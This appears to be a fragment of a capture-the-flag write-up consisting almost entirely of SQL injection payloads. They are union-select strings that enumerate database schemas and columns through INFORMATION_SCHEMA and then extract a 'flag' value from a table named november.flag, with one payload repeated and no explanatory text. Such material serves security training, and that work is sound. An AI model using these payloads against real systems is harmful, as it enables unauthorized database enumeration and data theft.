80
Last updated
Last updated
t' union select group_concat(schema_name) from INFORMATION_SCHEMA.SCHEMATA-- -t' union select group_concat(schema_name) from INFORMATION_SCHEMA.SCHEMATA-- -t' union select group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where table_name='flag'-- -t' union select one from november.flag-- -